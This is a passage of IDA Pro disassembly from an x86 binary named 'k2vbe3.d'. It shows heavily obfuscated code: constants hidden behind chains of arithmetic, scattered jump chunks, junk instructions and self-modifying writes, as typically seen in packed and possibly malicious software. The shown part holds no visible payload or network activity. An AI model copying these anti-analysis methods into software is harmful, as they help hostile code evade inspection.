loc_45553D:				; CODE XREF: sub_455829+9j
		pop	edx
		add	edx, 80E8A8E0h
		xor	edx, 7D7A2958h
		call	sub_457A58
; END OF FUNCTION CHUNK	FOR sub_455829
; START	OF FUNCTION CHUNK FOR sub_44E6B8

loc_45554F:				; CODE XREF: sub_44E6B8+Cj
		jmp	nullsub_190
; END OF FUNCTION CHUNK	FOR sub_44E6B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_455554:				; CODE XREF: sub_44083C:loc_443376j
		xor	edx, 0F55F750Ah
		add	edx, ebp

loc_45555C:				; CODE XREF: k2vbe3.d:loc_4465E6j
		add	edx, 5C71187h
		mov	edx, [edx]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_45975C
		jmp	loc_456160
; END OF FUNCTION CHUNK	FOR sub_44083C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E470

loc_455573:				; CODE XREF: sub_43E470:loc_43E47Aj
		jns	loc_4500C2
		or	ebp, 7CBA0B2Ah
		jmp	loc_457823
; END OF FUNCTION CHUNK	FOR sub_43E470
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_515. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_455585:				; CODE XREF: sub_453347+75FFj
		jmp	loc_43F06E
; END OF FUNCTION CHUNK	FOR sub_453347
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_378. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D4FF

loc_45558B:				; CODE XREF: sub_44D4FF+17j
		jmp	loc_45A850
; END OF FUNCTION CHUNK	FOR sub_44D4FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_455590:				; CODE XREF: sub_4468FE-9D99j
		jz	loc_45799F
		jmp	loc_44C673
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D0A9

loc_45559B:				; CODE XREF: sub_43D0A9+1E874j
		sub	ebx, 79D1DEC2h
		js	loc_45844E
		and	esi, ebp
		jmp	loc_443B64
; END OF FUNCTION CHUNK	FOR sub_43D0A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44809D

loc_4555AE:				; CODE XREF: sub_44809D:loc_448312j
		add	ecx, eax
		call	sub_45051F

loc_4555B5:				; CODE XREF: k2vbe3.d:0045B56Ej
		jmp	loc_4555E7
; END OF FUNCTION CHUNK	FOR sub_44809D
; ---------------------------------------------------------------------------
		popf
		jmp	sub_43CD32
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450B82

loc_4555C0:				; CODE XREF: sub_450B82+Dj
		or	ecx, 3517FA7Fh
		add	ecx, 0CAEBCB05h
		xchg	ecx, [esp+0]
		jmp	loc_43F9D3
; END OF FUNCTION CHUNK	FOR sub_450B82
; ---------------------------------------------------------------------------

loc_4555D4:				; CODE XREF: k2vbe3.d:004569D3j
		not	edx

loc_4555D6:				; CODE XREF: k2vbe3.d:loc_454D5Dj
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43D696
		jmp	loc_445EBC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44809D

loc_4555E7:				; CODE XREF: sub_44809D:loc_4555B5j
		mov	dword ptr [ebp-8], 1
; END OF FUNCTION CHUNK	FOR sub_44809D
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_4555EE:				; CODE XREF: k2vbe3.d:loc_4473D6j
					; sub_44D298-2B02j
		push	0DD2AF34Ch
		pop	eax
		sub	eax, 40C53129h
		cmp	eax, 63BD5461h
		jmp	loc_456F2B
; END OF FUNCTION CHUNK	FOR sub_44D298
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_293. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440EA2

loc_455606:				; CODE XREF: sub_440EA2+14j
		jmp	loc_45A836
; END OF FUNCTION CHUNK	FOR sub_440EA2
; ---------------------------------------------------------------------------
		jnz	loc_45663C
		jmp	loc_43FF53
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_212. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_455617:				; CODE XREF: k2vbe3.d:00448B45j
		jmp	loc_44675A
; ---------------------------------------------------------------------------

loc_45561C:				; CODE XREF: k2vbe3.d:00453F88j
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp]
		call	sub_443A95
		mov	eax, 32FE4135h
		push	edi
		push	offset sub_443021
		jmp	loc_452A15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF34

loc_455637:				; CODE XREF: sub_44FF34+539Bj
		ja	loc_45A3EC
		test	edx, ebp
		jmp	loc_45031A
; END OF FUNCTION CHUNK	FOR sub_44FF34
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2DF

loc_455644:				; CODE XREF: sub_44A2DF:loc_4467CCj
					; sub_44498A:loc_4467DCj
		xor	eax, 0BCEC04A7h
		rol	eax, 1Ch
		xor	eax, 782613Ah
		push	offset loc_44DC3C
		jmp	sub_4574D4
; END OF FUNCTION CHUNK	FOR sub_44A2DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45512F

loc_45565D:				; CODE XREF: sub_45512F+12j
		jz	loc_449B1C
		jmp	loc_43C9FB
; END OF FUNCTION CHUNK	FOR sub_45512F
; ---------------------------------------------------------------------------

loc_455668:				; CODE XREF: k2vbe3.d:0044C7ECj
		shl	ebp, 9
		rol	esi, 9
; START	OF FUNCTION CHUNK FOR sub_449372

loc_45566E:				; CODE XREF: sub_449372:loc_44C7DDj
		or	eax, 3F970C5Dh
		add	eax, 0BAE5208Eh
		add	eax, ebp
		add	eax, 543D10Dh
		mov	eax, [eax]
		jmp	loc_446B92
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FAE2

loc_455689:				; CODE XREF: sub_43FAE2+1AB80j
		cmp	byte ptr [eax],	0
		jnz	loc_43C007
; END OF FUNCTION CHUNK	FOR sub_43FAE2
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_455692:				; CODE XREF: sub_446CCF:loc_44F547j
		jnb	loc_4539DA
		call	sub_459216
; END OF FUNCTION CHUNK	FOR sub_446CCF
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_45569D:				; CODE XREF: sub_4467A1:loc_43F2F3j
					; sub_444D7B+7EDFj ...
		push	4ECB8BCDh
		pop	eax
		or	eax, 0F571AC45h
		sub	eax, 0FD23D945h
		test	eax, 100000h
		jmp	loc_45017D
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_4556BA:				; CODE XREF: sub_45AD42-54B2j
		pushf
		push	0CEC07ADFh
		pop	eax
		xor	eax, 0AE769CA8h
		jmp	loc_452BFA
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4556CC:				; CODE XREF: sub_43CCD0+10592j
		jo	loc_44ECEE
		add	eax, 7CC6B864h

loc_4556D8:				; CODE XREF: sub_43CCD0:loc_43EF18j
		jmp	loc_43CECD
; ---------------------------------------------------------------------------

loc_4556DD:				; CODE XREF: sub_43CCD0+3D37j
		js	loc_44D5AE
		lea	eax, [ebp-0Ch]
		push	eax
		call	sub_45A323
		jmp	loc_452923
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
		adc	ecx, 0E3327416h

loc_4556F7:				; CODE XREF: k2vbe3.d:loc_444B8Fj
		xor	edx, ecx
		jmp	sub_44D9A7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_4556FE:				; CODE XREF: sub_457580:loc_442EE4j
		pop	edi
		xor	edi, 77D6BA29h
		or	edi, 0C6935C09h
		add	edi, 218978E5h
		xchg	edi, [esp+0]
		jmp	sub_453FF1
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E059

loc_455719:				; CODE XREF: sub_44E059-A788j
		sub	ecx, eax
; END OF FUNCTION CHUNK	FOR sub_44E059
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_45571B:				; CODE XREF: sub_44B94B:loc_43D012j
					; sub_44B94B-B058j ...
		jo	loc_43F0A2
		cmp	dword ptr [ebp-4], 5

loc_455725:				; CODE XREF: k2vbe3.d:00449CF2j
		jnz	loc_4465FA
		jmp	loc_4554D7
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
		mov	[ecx], edi
		jmp	loc_43DEFC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_455737:				; CODE XREF: sub_4570C0+Dj
		mov	eax, ds:dword_43FA90
		or	eax, eax
		jnz	loc_43EF9D
		jmp	loc_45C0FB
; END OF FUNCTION CHUNK	FOR sub_4570C0

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45574A	proc near		; DATA XREF: k2vbe3.d:00456398o

; FUNCTION CHUNK AT 004407E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004453EC SIZE 00000006 BYTES

		mov	ebp, esp
		push	ecx
		push	ecx
		push	0B2A4CE96h
		pop	ecx
		and	ecx, ds:4000F2h
		jmp	loc_4407E9
sub_45574A	endp

; ---------------------------------------------------------------------------

loc_45575F:				; CODE XREF: k2vbe3.d:004540D8j
		rol	eax, 4

; =============== S U B	R O U T	I N E =======================================



sub_455762	proc near		; CODE XREF: sub_44D6B7:loc_4514ADp

; FUNCTION CHUNK AT 00459AC8 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	byte ptr [eax],	0C3h
		jmp	loc_459AC8
sub_455762	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_45576E:				; CODE XREF: sub_44469A:loc_441CA2j
					; k2vbe3.d:00441CCAj
		or	ebx, 6CB5FD85h
		and	ebx, 0DD37FB3Ah
		add	ebx, 8F104D83h
		add	ecx, ebx
		pop	ebx
		mov	ecx, [ecx]
		jmp	loc_458B13
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D863

loc_45578A:				; CODE XREF: sub_44D863+DDE2j
		add	eax, 3DB929C6h
		push	eax
		push	0C5E3D8C7h
		pop	eax
		jmp	loc_446253
; END OF FUNCTION CHUNK	FOR sub_44D863
; ---------------------------------------------------------------------------

loc_45579C:				; DATA XREF: sub_449488:loc_44772Fo
		xchg	ecx, [esp]
		mov	edx, ecx
		pop	ecx
		jb	loc_45BB21
		mov	eax, [esp]
		push	edi
		mov	edi, edx
		jmp	loc_44689B
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 7
		mov	ds:dword_44285C, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_4557BE:				; CODE XREF: sub_43C3A9+11EBFj
		rol	eax, 7
		push	offset sub_454CA0
		jmp	loc_443482
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_4557CB:				; CODE XREF: k2vbe3.d:loc_441546j
		mov	ecx, edx
		xchg	ecx, [esp]
		call	sub_455F6B
		mov	eax, 5AB1337Ah
		call	sub_4553CC
		push	ebx
		mov	ebx, ecx
		jmp	loc_459C23
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_304. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_4557E8:				; CODE XREF: sub_4523BE:loc_44BA6Bj
		push	13DDF781h
		pop	ecx
		xor	ecx, 6790CA09h
		rol	ecx, 0Dh
		and	ecx, 94A15D5Ch
		add	ecx, 8934E312h
		add	eax, ecx
		pop	ecx
		jmp	loc_458DDD
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------
		mov	eax, [esp]
		call	sub_453347
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4401FF

loc_455814:				; CODE XREF: sub_4401FF+ABDDj
		jmp	loc_43ED7D
; END OF FUNCTION CHUNK	FOR sub_4401FF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_455819:				; CODE XREF: sub_447C43:loc_447C51j
		jmp	loc_44BEBF
; END OF FUNCTION CHUNK	FOR sub_447C43
; ---------------------------------------------------------------------------
		dw 378h
dword_455820	dd 5F70B78Bh		; DATA XREF: sub_442C22+4r
					; sub_4506C3+6r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_455824:				; CODE XREF: sub_45762D-179B2j
		jmp	loc_43CCA0
; END OF FUNCTION CHUNK	FOR sub_45762D

; =============== S U B	R O U T	I N E =======================================



sub_455829	proc near		; CODE XREF: sub_40477B+40p
					; sub_40FE06+222p ...

; FUNCTION CHUNK AT 0045553D SIZE 00000012 BYTES

		push	edx
		push	7C8C055Bh
		shr	edx, 0Eh
		jmp	loc_45553D
sub_455829	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563FD

loc_455837:				; CODE XREF: sub_4563FD:loc_45640Dj
					; k2vbe3.d:loc_45B497j
		not	edx
		mov	edi, [esi]
		sbb	ecx, 0E7167318h
		jmp	loc_43DABD
; END OF FUNCTION CHUNK	FOR sub_4563FD
; ---------------------------------------------------------------------------

loc_455846:				; CODE XREF: k2vbe3.d:0044ED68j
		pop	edi
		and	edi, 0E4459A39h
		rol	edi, 1
		or	edi, 92E54B16h
		xor	edi, 0E870E51Dh
		cmp	edi, 2E0535Bh
		jmp	loc_446A39
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_455866:				; CODE XREF: sub_4481FA-4BD2j
		xor	eax, esi
		pop	esi
		jmp	loc_4488F5
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B8EF

loc_45586E:				; CODE XREF: sub_44B8EFj
		push	4A8B8B75h
		pop	eax
		jmp	loc_44909A
; END OF FUNCTION CHUNK	FOR sub_44B8EF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_455879:				; CODE XREF: sub_45AD42:loc_442CF0j
		xor	ecx, 47F92BF0h
		add	ecx, 858CFA7Fh
		add	ecx, ebp
		add	ecx, 0E0EE3124h
		mov	[ecx], edx
		pop	ecx
		jmp	loc_4556BA
; END OF FUNCTION CHUNK	FOR sub_45AD42

; =============== S U B	R O U T	I N E =======================================



sub_455895	proc near		; CODE XREF: k2vbe3.d:loc_43F82Ep
					; k2vbe3.d:004410E6j
		xchg	edx, [esp+0]
		pop	edx
		call	sub_4432B0
		mov	ds:dword_445E50, eax
		call	sub_4436CE
		jmp	loc_44CFCC
sub_455895	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	ebx, 69BCEEC7h
		jmp	loc_4407AF
; ---------------------------------------------------------------------------

loc_4558B8:				; CODE XREF: k2vbe3.d:loc_43F9DEj
		jnz	loc_4460D2
		xchg	edx, ebx
		jmp	loc_4460CD
; ---------------------------------------------------------------------------

loc_4558C5:				; CODE XREF: k2vbe3.d:0043F8A9j
		push	0F75EC9F5h
		xor	edx, edi
		jl	loc_451FAD
		jbe	loc_44896C
		jmp	loc_4560B9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B3C0

loc_4558DE:				; CODE XREF: sub_44B3C0+Dj
		jmp	loc_44F24B
; END OF FUNCTION CHUNK	FOR sub_44B3C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4582DD

loc_4558E3:				; CODE XREF: sub_4582DD-1A118j
		jmp	loc_441B44
; END OF FUNCTION CHUNK	FOR sub_4582DD
; ---------------------------------------------------------------------------
		call	nullsub_514
		jmp	ds:dword_41E170
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F56

loc_4558F3:				; CODE XREF: sub_441F56+8j
		jmp	nullsub_516
; END OF FUNCTION CHUNK	FOR sub_441F56
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_514. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jo	loc_453F85
		mov	eax, [esp]
		jmp	loc_441340
; ---------------------------------------------------------------------------
		xchg	ebp, ecx
		jmp	sub_45A502
; ---------------------------------------------------------------------------

locret_45590E:				; CODE XREF: k2vbe3.d:0045A8AAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_45590F:				; CODE XREF: sub_43F7AC+2CBDj
		push	18FF3A99h

loc_455914:				; CODE XREF: sub_43F7AC:loc_45C26Fj
		push	0D502B233h
		pop	eax
		or	eax, 7686C2C1h
		jmp	loc_453E55
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
		mov	eax, 0CEEC89B4h
		push	edx
		push	53C1BB5Bh
		pop	edx
		rol	edx, 1Fh
		add	edx, 5663AD9Dh
		xchg	edx, [esp]
		jmp	loc_44158D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4471DC

loc_455942:				; CODE XREF: sub_4471DC+7E87j
					; k2vbe3.d:004574B7j
		sub	ecx, 49DF43C5h
		xor	ecx, 0E106BC02h
		add	ecx, 4F6C6493h
		push	offset loc_4454D9
		jmp	nullsub_530
; END OF FUNCTION CHUNK	FOR sub_4471DC
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_528. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_45595F:				; CODE XREF: sub_45B74D:loc_454F01j
		jmp	loc_443C1B
; END OF FUNCTION CHUNK	FOR sub_45B74D
; ---------------------------------------------------------------------------

loc_455964:				; CODE XREF: k2vbe3.d:00452CD0j
		jmp	loc_44F530
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_455969:				; CODE XREF: sub_443EF6+3CBBj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444B3E

loc_45596E:				; CODE XREF: sub_444B3E:loc_44734Aj
		rol	eax, 11h
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

loc_455973:				; CODE XREF: k2vbe3.d:00457A89j
		jmp	loc_448A3C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_455978:				; CODE XREF: sub_447E07+ECDAj
		jmp	loc_45A880
; END OF FUNCTION CHUNK	FOR sub_447E07

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_45597D	proc near		; CODE XREF: sub_43FF59+1989p
		push	ebp
		mov	ebp, esp
		jmp	loc_44741E
sub_45597D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_455985:				; CODE XREF: sub_4440E5:loc_456F70j
		xchg	ebx, [esp+0]

loc_455988:				; CODE XREF: sub_44469A-12A1j
		call	dword ptr [ebp-4]
; END OF FUNCTION CHUNK	FOR sub_4440E5
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_45598B:				; CODE XREF: sub_43CCD0+209j
		mov	esp, ebp
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4588E6

loc_45598F:				; CODE XREF: sub_4588E6+12j
		jmp	loc_457496
; END OF FUNCTION CHUNK	FOR sub_4588E6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2DF

loc_455994:				; CODE XREF: sub_44A2DF+D51Dj
		jmp	loc_452A1F
; END OF FUNCTION CHUNK	FOR sub_44A2DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44083C

loc_455999:				; CODE XREF: sub_44083C+1592Aj
		jmp	loc_45611A
; END OF FUNCTION CHUNK	FOR sub_44083C
; ---------------------------------------------------------------------------

loc_45599E:				; CODE XREF: k2vbe3.d:004449BFj
		jmp	nullsub_406
; ---------------------------------------------------------------------------

loc_4559A3:				; CODE XREF: k2vbe3.d:00459205j
		push	eax
		jmp	loc_43E123
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_4559A9:				; CODE XREF: sub_446CE6:loc_441264j
		pop	ebx
		mov	eax, ds:dword_44DA58
		or	eax, eax
		jnz	loc_446792
		jmp	loc_45B412
; END OF FUNCTION CHUNK	FOR sub_446CE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C49B

loc_4559BD:				; CODE XREF: sub_44C49B+7j
		mov	eax, [esp-8+arg_4]
		push	edx
		push	ebx
		push	5C7CA866h
		jmp	loc_441655
; END OF FUNCTION CHUNK	FOR sub_44C49B
; ---------------------------------------------------------------------------

loc_4559CC:				; CODE XREF: k2vbe3.d:00456924j
		pop	edi
		xor	edi, 0FD864FD9h
		cmp	edi, 7F92C4D8h
		jmp	loc_4563E9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_344. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_4559DF:				; CODE XREF: k2vbe3.d:004593EAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45496E

loc_4559E0:				; CODE XREF: sub_45496E-FEC0j
		ror	eax, 12h
		add	eax, 14AC407Bh
; END OF FUNCTION CHUNK	FOR sub_45496E
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_4559E9:				; CODE XREF: sub_454E69-73E3j
		push	edi
		push	70E383CDh
		jmp	loc_44A873
; END OF FUNCTION CHUNK	FOR sub_454E69

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn


sub_4559F4	proc near		; CODE XREF: sub_43CD53+13j
					; k2vbe3.d:0044098Cp ...
		retn
sub_4559F4	endp

; ---------------------------------------------------------------------------
		or	al, 24h
		mov	edx, ecx
		pop	ecx
		jnz	loc_43CD6B
		mov	eax, [esp]
		push	ecx
		jmp	loc_449EC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E83

loc_455A09:				; CODE XREF: sub_454E83-176B5j
		jle	loc_452FF8
		sub	edi, 0D0300E1Dh
		jmp	loc_44849C
; END OF FUNCTION CHUNK	FOR sub_454E83
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_23. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448AE2

loc_455A1B:				; CODE XREF: sub_448AE2+Aj
		jmp	loc_4404A8
; END OF FUNCTION CHUNK	FOR sub_448AE2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F174

loc_455A20:				; CODE XREF: sub_44F174-125ADj
		jmp	loc_446D0C
; END OF FUNCTION CHUNK	FOR sub_44F174
; ---------------------------------------------------------------------------
		jl	loc_454EE0
		jmp	sub_43CCB3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B58F

loc_455A30:				; CODE XREF: sub_44B58F:loc_45411Aj
		mov	ecx, ebx
		pop	ebx
		sub	ecx, 45A7D6E5h
		add	ecx, 866759F0h
		jmp	loc_45A6DF
; END OF FUNCTION CHUNK	FOR sub_44B58F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EDD

loc_455A44:				; CODE XREF: sub_454EDD:loc_449F32j
		jnb	loc_454B29
		jmp	loc_44C072
; END OF FUNCTION CHUNK	FOR sub_454EDD

; =============== S U B	R O U T	I N E =======================================



sub_455A4F	proc near		; CODE XREF: sub_44680D+8718p
					; k2vbe3.d:00458DF3j

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441C98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D531 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454556 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00454781 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045723D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00459E4F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B0D5 SIZE 00000020 BYTES

		xchg	eax, [esp+0]
		pop	eax
		jns	loc_44D531
		xor	eax, 1D0D0D27h
		jmp	loc_45723D
sub_455A4F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_455A64:				; CODE XREF: sub_455BEA:loc_450292j
		jnz	loc_44F6EA
; END OF FUNCTION CHUNK	FOR sub_455BEA
; START	OF FUNCTION CHUNK FOR sub_445EB0

loc_455A6A:				; CODE XREF: sub_445EB0+82CFj
		jmp	sub_43FDA2
; END OF FUNCTION CHUNK	FOR sub_445EB0
; ---------------------------------------------------------------------------
		push	4FE649D0h
		jbe	loc_43F172
		xor	ebp, 0E82613FCh
		xor	edx, eax
		jmp	loc_44DE40
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_235. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_455A88:				; CODE XREF: k2vbe3.d:00456E54j
		jmp	loc_4442C0
; ---------------------------------------------------------------------------

loc_455A8D:				; CODE XREF: k2vbe3.d:0043F476j
		jmp	loc_44C69C
; ---------------------------------------------------------------------------
		and	ebx, esi
		jmp	loc_45C38B
; ---------------------------------------------------------------------------

locret_455A99:				; CODE XREF: k2vbe3.d:00455BC9j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_455A9A:				; CODE XREF: sub_44C90E+70EDj
		jmp	loc_44E214
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EB3F

loc_455A9F:				; CODE XREF: sub_44EB3F-F68j
		jmp	loc_454F17
; END OF FUNCTION CHUNK	FOR sub_44EB3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D863

loc_455AA4:				; CODE XREF: sub_44D863+15j
		jmp	loc_45B631
; END OF FUNCTION CHUNK	FOR sub_44D863
; ---------------------------------------------------------------------------

loc_455AA9:				; CODE XREF: k2vbe3.d:loc_4497FBj
		pop	ebx
		rol	ebx, 0Dh
		cmp	ebx, 217C2D49h
		jmp	loc_44293B
; ---------------------------------------------------------------------------

loc_455AB8:				; CODE XREF: k2vbe3.d:0045A7FFj
		not	eax
		jmp	loc_448007
; ---------------------------------------------------------------------------

loc_455ABF:				; CODE XREF: k2vbe3.d:004421ADj
		test	edx, 4000000h
		jmp	loc_45BF8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_455ACA:				; CODE XREF: sub_45A323:loc_44562Cj
		mov	esi, [ebp+0]
		push	edx
		cdq
		jmp	loc_44AC98
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_455AD4:				; CODE XREF: k2vbe3.d:00446315j
		or	edi, 5A403ACh
		jmp	loc_44D2A6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_45. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C865

loc_455AE0:				; CODE XREF: sub_43C865+10j
		jmp	loc_458D2E
; END OF FUNCTION CHUNK	FOR sub_43C865
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_423. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_455AE6:				; CODE XREF: k2vbe3.d:00452250j
		jmp	loc_450C6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_455AEB:				; CODE XREF: sub_44D0D5:loc_4463AEj
		and	esi, 0B3546D25h
		xor	esi, 0BA0763B7h
		and	esi, 0F84F1DA8h
		add	esi, 1BC22119h
		popf
		xor	eax, esi
		pop	esi
		rol	eax, 3
		jmp	loc_44899C
; END OF FUNCTION CHUNK	FOR sub_44D0D5

; =============== S U B	R O U T	I N E =======================================



sub_455B0F	proc near		; CODE XREF: sub_452092:loc_44FE14p
					; k2vbe3.d:00451714j

; FUNCTION CHUNK AT 00452656 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		mov	eax, [ebp-4]
		push	edi
		mov	edi, eax
		xchg	edi, [esp+0]
		call	sub_4597AE
		jmp	loc_452656
sub_455B0F	endp


; =============== S U B	R O U T	I N E =======================================



sub_455B26	proc near		; DATA XREF: sub_4437D3:loc_43E03Co

var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0043F073 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043F9A4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BFE8 SIZE 0000000E BYTES

		mov	eax, esp
		push	0
		jmp	loc_43F073
sub_455B26	endp

; ---------------------------------------------------------------------------
